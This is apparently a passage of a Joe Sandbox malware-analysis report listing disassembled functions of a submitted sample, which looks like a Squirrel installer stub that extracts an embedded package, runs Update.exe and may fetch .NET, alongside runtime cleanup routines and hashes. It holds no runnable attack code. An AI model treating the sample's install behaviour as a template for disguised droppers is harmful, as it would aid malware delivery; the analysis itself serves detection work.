                                                                    • Instruction Fuzzy Hash: E1E04FB6644648EFC715CF55D841F55B7E8FB0AB24F10466EA822D7B90C735E904CA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002267C6 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 364fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32 ref: 002267C7
                                                                    • GetTempFileNameW.KERNEL32(?,Squirrel,?,?), ref: 002267EB
                                                                    • DeleteFileW.KERNEL32(?,?,Squirrel,?,?), ref: 00226800
                                                                    • PathIsUNCW.SHLWAPI(?,?,Squirrel,?,?), ref: 00226807
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00226852
                                                                    • GetLastError.KERNEL32 ref: 00226860
                                                                    • FindResourceW.KERNEL32(00000083,DATA), ref: 00226A03
                                                                    • LoadResource.KERNEL32(00000000), ref: 00226A20
                                                                    • SizeofResource.KERNEL32(00000000), ref: 00226A44
                                                                    • LockResource.KERNEL32(00000000), ref: 00226A59
                                                                    • DeleteFileW.KERNEL32(?), ref: 00226B25
                                                                    • FreeResource.KERNEL32(00000000), ref: 00226BE0
                                                                    • FreeResource.KERNEL32(?,Failed to extract installer), ref: 00226DF2
                                                                    Strings
                                                                    • Failed to extract installer, xrefs: 00226D69
                                                                    • DATA, xrefs: 002269F3
                                                                    • D, xrefs: 00226C2F
                                                                    • %s\%s, xrefs: 00226B10, 00226C06
                                                                    • %s\SquirrelSetup.log, xrefs: 002269E5
                                                                    • "%s" --install . %s, xrefs: 00226C7C
                                                                    • Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00226878
                                                                    • \SquirrelTemp, xrefs: 00226831
                                                                    • Update.exe, xrefs: 00226BE6
                                                                    • Squirrel, xrefs: 002267E5
                                                                    • There was an error while installing the application. Check the setup log for more information and contact the author., xrefs: 00226CF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$File$DeleteFree$AttributesCreateDirectoryErrorFindLastLoadLockNamePathSizeofTemp
                                                                    • String ID: "%s" --install . %s$%s\%s$%s\SquirrelSetup.log$D$DATA$Failed to extract installer$Squirrel$There was an error while installing the application. Check the setup log for more information and contact the author.$Unable to write to %s - IT policies may be restricting access to this folder$Update.exe$\SquirrelTemp
                                                                    • API String ID: 529842104-1023859308
                                                                    • Opcode ID: 5cafeddf518383955952f94e7bbb825c63045d62716caea319bd76c2426b8394
                                                                    • Instruction ID: ddd4b7acbc43489efcc20934b39a66b8e6ac0843557c03a53a7bee7887c5bc2b
                                                                    • Opcode Fuzzy Hash: 5cafeddf518383955952f94e7bbb825c63045d62716caea319bd76c2426b8394
                                                                    • Instruction Fuzzy Hash: 85D1B172D21239ABDB25DBA0EC9CADEB7BDAF04300F0001E5E509A3151DB749F988F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002212EC Relevance: 35.3, APIs: 9, Strings: 11, Instructions: 337filesynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002212F6
                                                                    • GetTempPathW.KERNEL32(00000104,?,-00000068), ref: 0022149F
                                                                    • GetTempFileNameW.KERNEL32(?,NDP,00000000,?), ref: 002214D6
                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00221517
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0022154F
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002216AB
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 002216BE
                                                                    • CloseHandle.KERNEL32(?), ref: 00221721
                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00221738
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: File$Temp$CloseCodeDeleteExitH_prolog3_HandleMoveNameObjectPathProcessSingleWait_wcsrchr
                                                                    • String ID: .exe$/passive /norestart /showrmui$/q /norestart$<$@$Cancel$Downloading$Downloading the .NET Framework installer$NDP$open$pL$
                                                                    • API String ID: 1126903545-3212488926
                                                                    • Opcode ID: 2a46081987ad0fe646b61d159368e90aa9d12ab6d58b84c07d9b8a72f955d428
                                                                    • Instruction ID: da57dcac168c6a41117bf45f3ad8f8b2160c06fdec5ace4f128d603686aedda0
                                                                    • Opcode Fuzzy Hash: 2a46081987ad0fe646b61d159368e90aa9d12ab6d58b84c07d9b8a72f955d428
                                                                    • Instruction Fuzzy Hash: C1C17071E20235ABDB24DFA4EC89FADB7B9AB94710F1401A5E409E7190DB718EB0CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023704F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00237093
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236BD3
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236BE5
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236BF7
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C09
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C1B
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C2D
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C3F
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C51
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C63
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C75
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C87
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C99
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236CAB
                                                                    • _free.LIBCMT ref: 00237088
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 002370AA
                                                                    • _free.LIBCMT ref: 002370BF
                                                                    • _free.LIBCMT ref: 002370CA
                                                                    • _free.LIBCMT ref: 002370EC
                                                                    • _free.LIBCMT ref: 002370FF
                                                                    • _free.LIBCMT ref: 0023710D
                                                                    • _free.LIBCMT ref: 00237118
                                                                    • _free.LIBCMT ref: 00237150
                                                                    • _free.LIBCMT ref: 00237157
                                                                    • _free.LIBCMT ref: 00237174
                                                                    • _free.LIBCMT ref: 0023718C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 8e87fac153fac7d0f7c3b4fcce75bd520b99693137682acdc7d5b8056c0b668a
                                                                    • Instruction ID: ffa4278169333ba372ae505973462ff4e149ac70d507987ebeeefcd861abb6a9
                                                                    • Opcode Fuzzy Hash: 8e87fac153fac7d0f7c3b4fcce75bd520b99693137682acdc7d5b8056c0b668a
                                                                    • Instruction Fuzzy Hash: 853150F2524206AFDF359E38DC46B56B3E9BF10320F108419E499D7261DE71EE609F14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229568 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 119libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 00229572
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000060,002472B0,Module,?), ref: 002295BD
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 002295D3
                                                                    • FindResourceW.KERNEL32(00000000,?,?), ref: 002295FE
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00229616
                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00229628
                                                                      • Part of subcall function 00221C76: GetLastError.KERNEL32(002214AE), ref: 00221C76
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002296EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoadResource$ErrorFindFreeH_prolog3_catch_LastSizeof
                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                    • API String ID: 1818814483-549000027
                                                                    • Opcode ID: 7db372a7121688337b1be1f67da7724ef349badb9658bf863b6c18bfd830775f
                                                                    • Instruction ID: 006b09389d5eb659a456d82d3292818afdb635cb31f7fa7c21904c4db4ad4c98
                                                                    • Opcode Fuzzy Hash: 7db372a7121688337b1be1f67da7724ef349badb9658bf863b6c18bfd830775f
                                                                    • Instruction Fuzzy Hash: DB4199F1E20139ABCB219F94AD85BAD76FCEF48350F504095F609A6252DB708EA0CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00228069 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 258stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00228070
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00228145
                                                                    • EnterCriticalSection.KERNEL32(00000011,?,?,?,?,?,002296E7,00000000,?), ref: 00228281
                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,002296E7,00000000,?), ref: 0022829D
                                                                    • LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,002296E7,00000000,?), ref: 002282C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterH_prolog3_Leave_wcsstrlstrcmpi
                                                                    • String ID: }}$%$'$HKCR$HKCU{Software{Classes
                                                                    • API String ID: 2331752857-792530599
                                                                    • Opcode ID: af2533ed20bb3981fbf793a6854364a57722a8bb8d8a1ceec68ee032a3095598
                                                                    • Instruction ID: 6e8e83776353d84a7efc9e26e44b4f0d1f3520b36965392b910fedd5ed83be1a
                                                                    • Opcode Fuzzy Hash: af2533ed20bb3981fbf793a6854364a57722a8bb8d8a1ceec68ee032a3095598
                                                                    • Instruction Fuzzy Hash: 56919F31D25266EFDF10DFE8E8986ADBBB4AF05700B244169E845AB295DF30DC24CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00222641 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(DeploymentTool.exe,?,00000000), ref: 00222659
                                                                    • lstrlenW.KERNEL32(00245110,?,?,00000000), ref: 0022266C
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00222692
                                                                    • _wcsstr.LIBVCRUNTIME ref: 002226A7
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002226B6
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022275D
                                                                    • _wcsstr.LIBVCRUNTIME ref: 002227DE
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 002227F1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsstrlstrlen
                                                                    • String ID: DeploymentTool.exe
                                                                    • API String ID: 4267858634-1188192670
                                                                    • Opcode ID: cf56db99ec58a4859b0646e63cb337d44e916591847b32243cd4faaaf6800a7b
                                                                    • Instruction ID: 29912454ab3d439aa2b01119ce76990262a2568ddbe75782585ebae17ed9b79d
                                                                    • Opcode Fuzzy Hash: cf56db99ec58a4859b0646e63cb337d44e916591847b32243cd4faaaf6800a7b
                                                                    • Instruction Fuzzy Hash: B6519E31E1022AFFCB14DFA8E9C59ADB7F8FF48314B100569D405A7251DB71AA25CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002330B8 Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 002330CE
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 002330DA
                                                                    • _free.LIBCMT ref: 002330E5
                                                                    • _free.LIBCMT ref: 002330F0
                                                                    • _free.LIBCMT ref: 002330FB
                                                                    • _free.LIBCMT ref: 00233106
                                                                    • _free.LIBCMT ref: 00233111
                                                                    • _free.LIBCMT ref: 0023311C
                                                                    • _free.LIBCMT ref: 00233127
                                                                    • _free.LIBCMT ref: 00233135
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8fbb03a21da3511b5e6ce84ec9dcca777e1961f5e8a46d4e9a7760bbad8f03a5
                                                                    • Instruction ID: 9b99a02c3b0c2b135d623a832979df3c0068c874d805f6aeff826a243948047c
                                                                    • Opcode Fuzzy Hash: 8fbb03a21da3511b5e6ce84ec9dcca777e1961f5e8a46d4e9a7760bbad8f03a5
                                                                    • Instruction Fuzzy Hash: BF21A6B6910108BFCB42EF94CC52DDE7BB9EF08310F4081A6F5159B261DA31EB659F84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002361EE Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free_wcschr
                                                                    • String ID:
                                                                    • API String ID: 3422831350-0
                                                                    • Opcode ID: ed2812bca0c36e308c8b8e1f855079490185443dabc474c8c3cc8aab7d3b6c7f
                                                                    • Instruction ID: 22c1ac565892faab538c1ae8f234fd77685aec3936d4ca7c607795bb6288a9c5
                                                                    • Opcode Fuzzy Hash: ed2812bca0c36e308c8b8e1f855079490185443dabc474c8c3cc8aab7d3b6c7f
                                                                    • Instruction Fuzzy Hash: F66108F1D20202BFCB25AF64DC89A6E7BACAF05320F55856DFA1597281EB70D9208B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00225DE0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 214filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 00225FB9
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00226032
                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 00226071
                                                                    • CloseHandle.KERNEL32(?), ref: 00226082
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeWrite
                                                                    • String ID: %s%s$%s%s%s$:
                                                                    • API String ID: 3229859547-3034790606
                                                                    • Opcode ID: 83b44242b44159c4a54055090485083a4ca8337d60e0f6dc9c38783dba98e6a4
                                                                    • Instruction ID: a8188c9683878d858fabf1b9ff265c43cd90a34009449fea6ae9e454a8270cab
                                                                    • Opcode Fuzzy Hash: 83b44242b44159c4a54055090485083a4ca8337d60e0f6dc9c38783dba98e6a4
                                                                    • Instruction Fuzzy Hash: B0710571224B71ABD734DFA4F988AABB3E4FF84310F10892EE59987190DB7099648752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022695F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00226852
                                                                    • GetLastError.KERNEL32 ref: 00226860
                                                                    • CreateDirectoryW.KERNEL32(?), ref: 0022696A
                                                                    • GetLastError.KERNEL32 ref: 00226978
                                                                    • FreeResource.KERNEL32(?,Failed to extract installer), ref: 00226DF2
                                                                    Strings
                                                                    • \SquirrelTemp, xrefs: 00226831
                                                                    • Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00226878, 00226990
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast$FreeResource
                                                                    • String ID: Unable to write to %s - IT policies may be restricting access to this folder$\SquirrelTemp
                                                                    • API String ID: 2750073017-3128572547
                                                                    • Opcode ID: 2e5abb05e232bfd7e34bb30a9ab0bbfaa1200c813b0f271d308a47aace0cc053
                                                                    • Instruction ID: 2d84818a297bef8d4cd5e0c46fd1eb5c121ed22d4ca6412e0f13cbc57ac794ec
                                                                    • Opcode Fuzzy Hash: 2e5abb05e232bfd7e34bb30a9ab0bbfaa1200c813b0f271d308a47aace0cc053
                                                                    • Instruction Fuzzy Hash: 0441D672E21139ABDB25EBA4EC9DBDDB7B8AF14700F0400E5E509A3181DB749F988F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022C200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0022C22B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0022C233
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0022C2C1
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0022C2EC
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0022C341
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 7cbd5468bdaeca686938c4fe8d64652d8958c551da4bea2be264558b6440933b
                                                                    • Instruction ID: 15178437927d4b8a240a30598f537e8dbd8bd191a0bfbee3505eabedf42b5f72
                                                                    • Opcode Fuzzy Hash: 7cbd5468bdaeca686938c4fe8d64652d8958c551da4bea2be264558b6440933b
                                                                    • Instruction Fuzzy Hash: 5941D334E20229EBCF10DFE8E845A9EBBB4AF44314F248255EC145B392DB359E25CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00234846 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: e5bf400879a867ed558b299cd12abd8e1dbc8abad66300bd1bd91dbdb00d55f0
                                                                    • Instruction ID: d8777dfe6182e8726ad451b5dee21700b59be0d55011ddb5dcbcc18aa6fd4832
                                                                    • Opcode Fuzzy Hash: e5bf400879a867ed558b299cd12abd8e1dbc8abad66300bd1bd91dbdb00d55f0
                                                                    • Instruction Fuzzy Hash: E2210DB5E31361E7C721AF29BC44F2A77589F06764F1102A1EE05A7291D730FD3086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00236D55 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00236D1D: _free.LIBCMT ref: 00236D42
                                                                    • _free.LIBCMT ref: 00236DA3
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 00236DAE
                                                                    • _free.LIBCMT ref: 00236DB9
                                                                    • _free.LIBCMT ref: 00236E0D
                                                                    • _free.LIBCMT ref: 00236E18
                                                                    • _free.LIBCMT ref: 00236E23
                                                                    • _free.LIBCMT ref: 00236E2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 2963ffc26b61ef26470c5cc6503304249528645d02ca6a10ee3de8037808b7bd
                                                                    • Instruction ID: 3c8457f9832ff9006baa88b41b03f10ea1fee6728201b026df340189fc6a59bb
                                                                    • Opcode Fuzzy Hash: 2963ffc26b61ef26470c5cc6503304249528645d02ca6a10ee3de8037808b7bd
